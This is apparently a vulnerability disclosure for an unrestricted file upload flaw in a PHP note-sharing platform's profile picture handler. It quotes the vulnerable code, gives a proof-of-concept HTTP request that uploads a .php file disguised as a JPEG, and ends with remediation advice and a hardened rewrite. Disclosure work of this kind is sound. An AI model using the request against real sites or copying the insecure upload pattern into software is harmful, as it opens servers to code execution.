## Critical Vulnerability Summary

### Affected Product

- Online note-sharing platform

### Version

- V1.0

### Vulnerability Type

- Unrestricted Upload

### Root Cause

- In the `userprofile.php` file, input received via `$_FILES` is not validated or sanitized, and is used directly to determine the file storage location. The only type check compares the client-supplied `$_FILES['image']['type']` (the `Content-Type` of the multipart part, which the client sets freely) against a list of image MIME types, and the stored name keeps the extension of the uploaded filename. A `.php` file sent with `Content-Type: image/jpeg` therefore passes the check and is written to `profilepics/` under the web root. The vulnerable code snippet is as follows:

```php
if (isset($_POST['uploadphoto'])) {
    $image = $_FILES['image']['name'];
    $ext = $_FILES['image']['type'];   // client-controlled MIME type, not the real file type
    $validExt = array("image/gif", "image/jpeg", "image/pjpeg", "image/png");
    if (empty($image)) {
        $picture = $profilepic;
    } else if ($_FILES['image']['size'] > 1024000) {
        echo "<script>alert('Image size is not proper'); window.location.href='userprofile.php';</script>";
    } else if (!in_array($ext, $validExt)) {
        echo "<script>alert('Not a valid image'); window.location.href='userprofile.php';</script>";
    } else {
        $folder = 'profilepics/';
        // the original extension is preserved, so "x.php" is stored as "<random>.php"
        $imgext = strtolower(pathinfo($image, PATHINFO_EXTENSION));
        $picture = rand(1000, 1000000) . '.' . $imgext;
        if (move_uploaded_file($_FILES['image']['tmp_name'], $folder . $picture)) {
            $queryupdate = "UPDATE users SET image = '$picture' WHERE id = '$userid'";
            $result = mysqli_query($conn, $queryupdate) or die(mysqli_error($conn));
            if (mysqli_affected_rows($conn) > 0) {
                echo "<script>alert('Profile Photo uploaded successfully');</script>";
            }
        }
    }
}
```

### Impact

- Attackers can exploit this vulnerability to perform unrestricted file uploads, leading to file overwrites, file injection, directory traversal attacks, and denial-of-service (DoS). Remote attacks may also result in Remote Code Execution (RCE).

### Vulnerability Details and PoC

- The file upload functionality is handled by `userprofile.php`, and uploaded files are received via the `$_FILES` variable. Because the type check trusts the client-supplied MIME type and the stored file keeps the original extension, a remote attacker can upload a server-side script through the file upload mechanism, resulting in an unrestricted file upload and potentially leading to Remote Code Execution (RCE).
### Example Exploit Payload

```http
POST http://10.151.161.83:8822/dashboard/userprofile.php HTTP/1.1
Host: 10.151.161.83:8822
Content-Length: 43118
Cache-Control: max-age=0
Origin: http://10.151.161.83:8822
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydAAI7GZA34BSrv95
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.151.161.83:8822/dashboard/userprofile.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=okjv80qgsssm1k176l9ft762f6
Connection: keep-alive

------WebKitFormBoundarydAAI7GZA34BSrv95
Content-Disposition: form-data; name="image"; filename="[000000000.php"
Content-Type: image/jpeg

GIF89a
------WebKitFormBoundarydAAI7GZA34BSrv95
Content-Disposition: form-data; name="uploadphoto"

upload photo
------WebKitFormBoundarydAAI7GZA34BSrv95--
```

### Recommended Remediation

1. Strictly validate file types using a whitelist of allowed extensions and verify MIME types.
2. Validate file content by checking file signatures to confirm actual file types, and reject files containing malicious scripts.
3. Sanitize filenames by generating random unique names and removing special characters to prevent path traversal.
4. Set file size limits via server configuration.
5. Store uploaded files securely, preferably outside the web root directory; if web access is required, disable script execution in the upload directory.
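The following is an added example of how the upload branch of `userprofile.php` could be rewritten to apply the five remediation points together; it is not the platform's own code. It assumes `$conn` is a `mysqli` connection and `$userid` and `$profilepic` are set exactly as in the vulnerable snippet, and it assumes a constant `PROFILE_PIC_DIR` pointing at a directory outside the document root (the path shown is a placeholder). The real type is taken from the file content via `finfo` and cross-checked with `getimagesize()`, the stored name and extension are generated server-side from the whitelist rather than taken from the client, and the database update uses a prepared statement.

```php
<?php
// Added example (not the platform's code): hardened replacement for the
// upload branch in userprofile.php. Assumes $conn (mysqli), $userid and
// $profilepic exist as in the original snippet.

declare(strict_types=1);

const PROFILE_PIC_DIR = '/var/app-data/profilepics';   // assumption: outside the web root
const MAX_PIC_BYTES   = 1024000;                        // same limit the original enforced

// The only content types accepted, each mapped to the extension WE assign.
// Nothing from the client-supplied filename or Content-Type is ever reused.
// ("image/pjpeg" from the original list is a legacy IE alias; finfo reports
// progressive JPEGs as image/jpeg, so it is covered by that entry.)
const ALLOWED_IMAGE_TYPES = [
    'image/gif'  => 'gif',
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
];

/**
 * Validate one uploaded image and store it under a server-generated name.
 * Returns the stored filename; throws RuntimeException on any failure.
 */
function storeProfilePicture(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed or no file sent');
    }
    // Only accept a file PHP itself placed in the temp directory for this request.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }
    // Measure the temp file rather than trusting $_FILES['image']['size'].
    if (filesize($file['tmp_name']) > MAX_PIC_BYTES) {
        throw new RuntimeException('Image size is not proper');
    }

    // Real type from the file's magic bytes; $_FILES['image']['type'] is ignored.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_IMAGE_TYPES[$mime])) {
        throw new RuntimeException('Not a valid image');
    }
    // Independent second check: the image header must parse and agree on the type.
    // A bare "GIF89a" prefix passes finfo but has no dimensions, so it fails here.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info['mime'] !== $mime) {
        throw new RuntimeException('Not a valid image');
    }

    // Server-generated name: random hex, fixed charset, whitelisted extension.
    $picture = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
    $dest    = PROFILE_PIC_DIR . DIRECTORY_SEPARATOR . $picture;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store image');
    }
    chmod($dest, 0640);   // readable by the application, never executable
    return $picture;
}

if (isset($_POST['uploadphoto'])) {
    if (empty($_FILES['image']['name'])) {
        $picture = $profilepic;   // keep the current picture, as in the original
    } else {
        try {
            $picture = storeProfilePicture($_FILES['image']);
            // Prepared statement replaces the string-built UPDATE of the original.
            $stmt = $conn->prepare('UPDATE users SET image = ? WHERE id = ?');
            $stmt->bind_param('ss', $picture, $userid);
            $stmt->execute();
            if ($stmt->affected_rows > 0) {
                echo "<script>alert('Profile Photo uploaded successfully');</script>";
            }
        } catch (RuntimeException $e) {
            $msg = htmlspecialchars($e->getMessage(), ENT_QUOTES);
            echo "<script>alert('$msg'); window.location.href='userprofile.php';</script>";
        }
    }
}
```

Two design points are worth noting. First, a signature check on its own is not sufficient: the PoC body starts with the bytes `GIF89a`, which is exactly what a magic-byte check looks for, and a longer polyglot file could carry a complete image header as well. The example therefore never lets a passed check influence the stored name, extension or directory; even a file that fools both content checks is written as `<random>.gif` outside the web root, where the server will not execute it. Second, if the application must serve pictures from a web-reachable directory instead, remediation point 5 still applies: disable script handling for that directory in the web server configuration (for example an Apache `.htaccess` with `php_flag engine off` and a `Handler` reset, or an nginx `location` block that serves the directory as static files only), so that the storage location and the filename policy do not both have to be perfect.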